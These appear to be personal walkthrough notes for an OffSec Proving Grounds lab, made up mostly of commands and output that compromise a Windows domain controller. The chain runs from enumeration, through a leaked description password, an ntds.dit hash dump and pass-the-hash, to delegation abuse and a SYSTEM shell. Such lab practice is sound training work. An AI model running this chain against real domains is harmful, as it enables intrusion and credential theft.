No credentials were provided for this machine

nmap -vvv -T5 -Pn 192.168.192.175 -p- -A -oN nmap.txt

sudo echo "192.168.192.175 resourced.offsec" | sudo tee -a /etc/hosts

┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ dig any resourced.offsec @192.168.192.175

; <<>> DiG 9.20.11-4+b1-Debian <<>> any resourced.offsec @192.168.192.175
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 26762
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;resourced.offsec.              IN      ANY

;; Query time: 8039 msec
;; SERVER: 192.168.192.175#53(192.168.192.175) (TCP)
;; WHEN: Thu Oct 23 04:59:51 EDT 2025
;; MSG SIZE  rcvd: 45

┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ dig any resourced.local @192.168.192.175

; <<>> DiG 9.20.11-4+b1-Debian <<>> any resourced.local @192.168.192.175
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 7322
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;resourced.local.               IN      ANY

;; ANSWER SECTION:
resourced.local.        600     IN      A       192.168.120.181
resourced.local.        3600    IN      NS      resourcedc.resourced.local.
resourced.local.        3600    IN      SOA     resourcedc.resourced.local. hostmaster.resourced.local. 62 900 600 86400 3600

;; ADDITIONAL SECTION:
resourcedc.resourced.local. 3600 IN     A       192.168.192.175

;; Query time: 28 msec
;; SERVER: 192.168.192.175#53(192.168.192.175) (TCP)
;; WHEN: Thu Oct 23 05:01:16 EDT 2025
;; MSG SIZE  rcvd: 148

https://github.com/nirajkharel/AD-Pentesting-Notes

┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ ldapsearch -x -H ldap://192.168.192.175 -s base namingcontexts
dn:
namingcontexts: DC=resourced,DC=local
namingcontexts: CN=Configuration,DC=resourced,DC=local
namingcontexts: CN=Schema,CN=Configuration,DC=resourced,DC=local
namingcontexts: DC=DomainDnsZones,DC=resourced,DC=local
namingcontexts: DC=ForestDnsZones,DC=resourced,DC=local

┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ rpcclient -U "" 192.168.192.175 -N
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[M.Mason] rid:[0x44f]
user:[K.Keen] rid:[0x450]
user:[L.Livingstone] rid:[0x451]
user:[J.Johnson] rid:[0x452]
user:[V.Ventz] rid:[0x453]
user:[S.Swanson] rid:[0x454]
user:[P.Parker] rid:[0x455]
user:[R.Robinson] rid:[0x456]
user:[D.Durant] rid:[0x457]
user:[G.Goldberg] rid:[0x458]
rpcclient $> queryuser v.ventz
        User Name   :   V.Ventz
        Full Name   :
        Home Drive  :
        Dir Drive   :
        Profile Path:
        Logon Script:
        Description :   New-hired, reminder: HotelCalifornia194!
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      Wed, 31 Dec 1969 19:00:00 EST
        Logoff Time              :      Wed, 31 Dec 1969 19:00:00 EST
        Kickoff Time             :      Wed, 13 Sep 30828 22:48:05 EDT
        Password last set Time   :      Fri, 01 Oct 2021 07:14:52 EDT
        Password can change Time :      Sat, 02 Oct 2021 07:14:52 EDT
        Password must change Time:      Wed, 13 Sep 30828 22:48:05 EDT
        unknown_2[0..31]...
        user_rid :      0x453
        group_rid:      0x201
        acb_info :      0x00000210
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000000
        padding1[0..7]...
        logon_hrs[0..21]...

--> resourced.local\v.ventz
--> Description :   New-hired, reminder: HotelCalifornia194!

┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ rpcclient -U "resourced.local\v.ventz" 192.168.192.175
Password for [RESOURCED.LOCAL\v.ventz]:
rpcclient $> srvinfo
        192.168.192.175Wk Sv PDC Tim NT     
        platform_id     :       500
        os version      :       10.0
        server type     :       0x80102b
rpcclient $>

┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ impacket-GetUserSPNs resourced.local/v.ventz:'HotelCalifornia194!' -dc-ip 192.168.192.175 -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

No entries found!

┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ bloodhound-python -u 'v.ventz' -p 'HotelCalifornia194!' -d resourced.local -ns 192.168.192.175 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: resourced.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (resourcedc.resourced.local:88)] [Errno -3] Temporary failure in name resolution
INFO: Connecting to LDAP server: resourcedc.resourced.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: resourcedc.resourced.local
INFO: Found 14 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: ResourceDC.resourced.local
INFO: Done in 00M 06S
INFO: Compressing output into 20251023070838_bloodhound.zip

┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ impacket-secretsdump resourced.local/v.ventz:'HotelCalifornia194!'@192.168.192.175
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid.
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...

Retrieve and analyze sensitive files from the Password Audit share to extract domain user hashes.

┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ smbclient -L resourced.offsec -U 'resourced.local\\v.ventz%HotelCalifornia194!' -m SMB3

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Password Audit  Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to resourced.offsec failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ smbclient "//resourced.offsec/Password Audit" -U 'resourced.local\\v.ventz%HotelCalifornia194!' -m SMB3 -c 'ls'
  .                                   D        0  Tue Oct  5 04:49:16 2021
  ..                                  D        0  Tue Oct  5 04:49:16 2021
  Active Directory                    D        0  Tue Oct  5 04:49:15 2021
  registry                            D        0  Tue Oct  5 04:49:16 2021

                7706623 blocks of size 4096. 2718166 blocks available

┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ smbclient "//resourced.offsec/Password Audit" -U 'resourced.local\\v.ventz%HotelCalifornia194!' -m SMB3 -c 'ls "Active Directory/"'
  .                                   D        0  Tue Oct  5 04:49:16 2021
  ..                                  D        0  Tue Oct  5 04:49:16 2021
  ntds.dit                            A 25165824  Mon Sep 27 07:30:54 2021
  ntds.jfm                            A    16384  Mon Sep 27 07:30:54 2021

                7706623 blocks of size 4096. 2718150 blocks available

https://hackviser.com/tactics/pentesting/services/smb#common-smb-commands

┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ smbget smb:"//resourced.offsec/Password Audit/Active Directory/ntds.dit" -U 'resourced.local\\v.ventz%HotelCalifornia194!'
Using user: v.ventz
smb://resourced.offsec/Password Audit/Active Directory/ntds.dit                                                                                                                                                                             
Downloaded 24.00MB in 17 seconds
                                                                                                                                                                                                                                            
┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ ls ntds.dit 
ntds.dit
                                                                                                                                                                                                                                            
┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ file ntds.dit   
ntds.dit: Extensible storage engine DataBase, version 0x620, checksum 0xf95e9f08, page size 8192, Windows version 10.0

┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ smbget smb:"//resourced.offsec/Password Audit/registry/SYSTEM" -U 'resourced.local\\v.ventz%HotelCalifornia194!'
Using user: v.ventz
smb://resourced.offsec/Password Audit/registry/SYSTEM                                                                                                                                                                                       
Downloaded 16.00MB in 9 seconds
                                                                                                                                                                                                                                            
┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ ls SYSTEM  
SYSTEM
                                                                                                                                                                                                                                            
┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ file SYSTEM  
SYSTEM: MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                            
┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ impacket-secretsdump -ntds ntds.dit -system SYSTEM local                                                        
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x6f961da31c7ffaf16683f78e04c3e03d
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 9298735ba0d788c4fc05528650553f94
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3004b16f88664fbebfcb9ed272b0565b:::
M.Mason:1103:aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45:::
K.Keen:1104:aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c:::
L.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808:::
J.Johnson:1106:aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726:::
V.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c:::
S.Swanson:1108:aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939:::
P.Parker:1109:aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe:::
R.Robinson:1110:aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac:::
D.Durant:1111:aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35:::
G.Goldberg:1112:aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2:::
[*] Kerberos keys from ntds.dit 
Administrator:aes256-cts-hmac-sha1-96:73410f03554a21fb0421376de7f01d5fe401b8735d4aa9d480ac1c1cdd9dc0c8
Administrator:aes128-cts-hmac-sha1-96:b4fc11e40a842fff6825e93952630ba2
Administrator:des-cbc-md5:80861f1a80f1232f
RESOURCEDC$:aes256-cts-hmac-sha1-96:b97344a63d83f985698a420055aa8ab4194e3bef27b17a8f79c25d18a308b2a4
RESOURCEDC$:aes128-cts-hmac-sha1-96:27ea2c704e75c6d786cf7e8ca90e0a6a
RESOURCEDC$:des-cbc-md5:ab089e317a161cc1
krbtgt:aes256-cts-hmac-sha1-96:12b5d40410eb374b6b839ba6b59382cfbe2f66bd2e238c18d4fb409f4a8ac7c5
krbtgt:aes128-cts-hmac-sha1-96:3165b2a56efb5730cfd34f2df472631a
krbtgt:des-cbc-md5:f1b602194f3713f8
M.Mason:aes256-cts-hmac-sha1-96:21e5d6f67736d60430facb0d2d93c8f1ab02da0a4d4fe95cf51554422606cb04
M.Mason:aes128-cts-hmac-sha1-96:99d5ca7207ce4c406c811194890785b9
M.Mason:des-cbc-md5:268501b50e0bf47c
K.Keen:aes256-cts-hmac-sha1-96:9a6230a64b4fe7ca8cfd29f46d1e4e3484240859cfacd7f67310b40b8c43eb6f
K.Keen:aes128-cts-hmac-sha1-96:e767891c7f02fdf7c1d938b7835b0115
K.Keen:des-cbc-md5:572cce13b38ce6da
L.Livingstone:aes256-cts-hmac-sha1-96:cd8a547ac158c0116575b0b5e88c10aac57b1a2d42e2ae330669a89417db9e8f
L.Livingstone:aes128-cts-hmac-sha1-96:1dec73e935e57e4f431ac9010d7ce6f6
L.Livingstone:des-cbc-md5:bf01fb23d0e6d0ab
J.Johnson:aes256-cts-hmac-sha1-96:0452f421573ac15a0f23ade5ca0d6eada06ae85f0b7eb27fe54596e887c41bd6
J.Johnson:aes128-cts-hmac-sha1-96:c438ef912271dbbfc83ea65d6f5fb087
J.Johnson:des-cbc-md5:ea01d3d69d7c57f4
V.Ventz:aes256-cts-hmac-sha1-96:4951bb2bfbb0ffad425d4de2353307aa680ae05d7b22c3574c221da2cfb6d28c
V.Ventz:aes128-cts-hmac-sha1-96:ea815fe7c1112385423668bb17d3f51d
V.Ventz:des-cbc-md5:4af77a3d1cf7c480
S.Swanson:aes256-cts-hmac-sha1-96:8a5d49e4bfdb26b6fb1186ccc80950d01d51e11d3c2cda1635a0d3321efb0085
S.Swanson:aes128-cts-hmac-sha1-96:6c5699aaa888eb4ec2bf1f4b1d25ec4a
S.Swanson:des-cbc-md5:5d37583eae1f2f34
P.Parker:aes256-cts-hmac-sha1-96:e548797e7c4249ff38f5498771f6914ae54cf54ec8c69366d353ca8aaddd97cb
P.Parker:aes128-cts-hmac-sha1-96:e71c552013df33c9e42deb6e375f6230
P.Parker:des-cbc-md5:083b37079dcd764f
R.Robinson:aes256-cts-hmac-sha1-96:90ad0b9283a3661176121b6bf2424f7e2894079edcc13121fa0292ec5d3ddb5b
R.Robinson:aes128-cts-hmac-sha1-96:2210ad6b5ae14ce898cebd7f004d0bef
R.Robinson:des-cbc-md5:7051d568dfd0852f
D.Durant:aes256-cts-hmac-sha1-96:a105c3d5cc97fdc0551ea49fdadc281b733b3033300f4b518f965d9e9857f27a
D.Durant:aes128-cts-hmac-sha1-96:8a2b701764d6fdab7ca599cb455baea3
D.Durant:des-cbc-md5:376119bfcea815f8
G.Goldberg:aes256-cts-hmac-sha1-96:0d6ac3733668c6c0a2b32a3d10561b2fe790dab2c9085a12cf74c7be5aad9a91
G.Goldberg:aes128-cts-hmac-sha1-96:00f4d3e907818ce4ebe3e790d3e59bf7
G.Goldberg:des-cbc-md5:3e20fd1a25687673
[*] Cleaning up...


users.txt 
---------
Administrator
Guest
krbtgt
M.Mason
K.Keen
L.Livingstone
J.Johnson
V.Ventz
S.Swanson
P.Parker
R.Robinson
D.Durant
G.Goldberg

hashs.txt
---------
aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f
aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d
aad3b435b51404eeaad3b435b51404ee:3004b16f88664fbebfcb9ed272b0565b
aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45
aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c
aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808
aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726
aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c
aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939
aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe
aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac
aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35
aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2

https://www.netexec.wiki/

┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ nxc winrm 192.168.192.175  -u users.txt -H hashs.txt --no-progress
WINRM       192.168.192.175 5985   RESOURCEDC       [+] resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808 (Pwn3d!)

Use extracted hashes to authenticate and gain initial access to the domain.

┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ evil-winrm -i 192.168.192.175 -u l.livingstone -H '19a3a7550ce8c505c2d46b5e39d6f808'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> whoami
resourced\l.livingstone
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> cd ..
*Evil-WinRM* PS C:\Users\L.Livingstone> cd Desktop
*Evil-WinRM* PS C:\Users\L.Livingstone\Desktop> ls


    Directory: C:\Users\L.Livingstone\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       10/23/2025   6:52 AM             34 local.txt


*Evil-WinRM* PS C:\Users\L.Livingstone\Desktop> cat local.txt
3ba3e7e1ba5a795821d88b49b341765a
*Evil-WinRM* PS C:\Users\L.Livingstone\Desktop>

┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ bloodhound-python -u 'L.Livingstone' --hashes :19a3a7550ce8c505c2d46b5e39d6f808 -d resourced.local -ns 192.168.192.175 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: resourced.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (resourcedc.resourced.local:88)] [Errno -3] Temporary failure in name resolution
INFO: Connecting to LDAP server: resourcedc.resourced.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: resourcedc.resourced.local
INFO: Found 14 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: ResourceDC.resourced.local
INFO: Done in 00M 05S
INFO: Compressing output into 20251023104112_bloodhound.zip

https://www.kali.org/tools/bloodhound/

sudo bloodhound

l.livingstone --> resourcedc.resourced.local -tgt-> resourced.local --> DOMAIN ADMIN

Create a new machine account and assign delegation rights using Resource-Based Constrained Delegation.

┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ impacket-addcomputer resourced.local/l.livingstone -dc-ip 192.168.192.175 -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -computer-name 'kali$' -computer-pass 'password123!'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account kali$ with password password123!.
                                                                                                                                                                                                                                            
┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ impacket-rbcd -dc-ip 192.168.192.175 -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -delegate-to 'resourcedc$' -delegate-from 'kali$' -action write resourced.local/L.Livingstone
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] kali$ can now impersonate users on resourcedc$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     kali$        (S-1-5-21-537427935-490066102-1511301751-4101)

┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ impacket-getST -spn cifs/resourcedc.resourced.local -impersonate Administrator -dc-ip 192.168.192.175 resourced.local/kali\$:'password123!'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_resourcedc.resourced.local@RESOURCED.LOCAL.ccache

┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ export KRB5CCNAME=$(pwd)/Administrator@cifs_resourcedc.resourced.local@RESOURCED.LOCAL.ccache
                                                                                                                                                                                                                                            
┌──(lepotekil㉿kali)-[~/proving-ground-prac/resourced]
└─$ impacket-psexec -k -no-pass resourcedc.resourced.local -dc-ip 192.168.192.175                                                                                               
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on resourcedc.resourced.local.....
[*] Found writable share ADMIN$
[*] Uploading file lJZAxgAq.exe
[*] Opening SVCManager on resourcedc.resourced.local.....
[*] Creating service hJQS on resourcedc.resourced.local.....
[*] Starting service hJQS.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2145]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> cd C:\Users\Administrator\Desktop
 
C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 5C30-DCD7

 Directory of C:\Users\Administrator\Desktop

10/01/2021  04:28 AM    <DIR>          .
10/01/2021  04:28 AM    <DIR>          ..
10/23/2025  08:16 AM                34 proof.txt
               1 File(s)             34 bytes
               2 Dir(s)  10,878,578,688 bytes free

C:\Users\Administrator\Desktop> type proof.txt
7a55e03ff02452cc093e316d3201fd86

C:\Users\Administrator\Desktop>